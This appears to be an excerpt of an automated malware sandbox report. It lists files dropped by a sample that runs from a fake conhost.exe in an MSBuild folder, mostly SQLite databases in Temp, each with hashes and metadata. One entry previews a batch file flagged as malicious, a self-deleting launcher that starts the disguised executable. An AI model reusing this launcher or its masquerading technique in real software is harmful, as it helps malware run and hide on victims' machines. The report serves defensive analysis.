                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\kfgfe9Ek7x

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\kleO6Ve14y

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):259
                                                          Entropy (8bit):5.159641972598987
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DER5IWH11X6yKOZG1N723ffi:HTg9uYDEfPV1XEaHi
                                                          MD5:5FC7FB10B08D086B2E9F4D6335A8F1B2
                                                          SHA1:18348A99E89BBC2249E45327BCA769294378587B
                                                          SHA-256:AD7B7CA03EFAB7D1B3755512474596C7666724245DBC994D5D404C489E7EF8C1
                                                          SHA-512:8738AC1A66F33E3DD377B31A1D4B13DC893782CB169B55433C79043213488D601F269D2FEAB0F3698B31C6217EC9B24A3B5CC7E514BD05FD241F444F0092C5DA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\klrkJh2DBx.bat"

                                                          C:\Users\user\AppData\Local\Temp\lN2bG9CLsz

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\lQem7jzZVe

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\lWE4TC1R9e

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\lvnr1uZbta

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\m7kRG13W4C

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\mJfyJCPtth

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\mSuoaerc8j

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\mWJ8NP0pgg

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\maEyxkcciQ

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\moWJ7vPpTK

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\nHQaSafXya

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\nhADnqzdYk

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\nss67rS6AA

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\nuAd5dbLcZ

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\o10jWHG1nh

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\oDRVBntoMb

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\oKNTnMdpLV

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\oVabryO8e6

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\obIgWi6YqM

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\p38Mz0Ynk5

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\p8SIgjxvSm

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
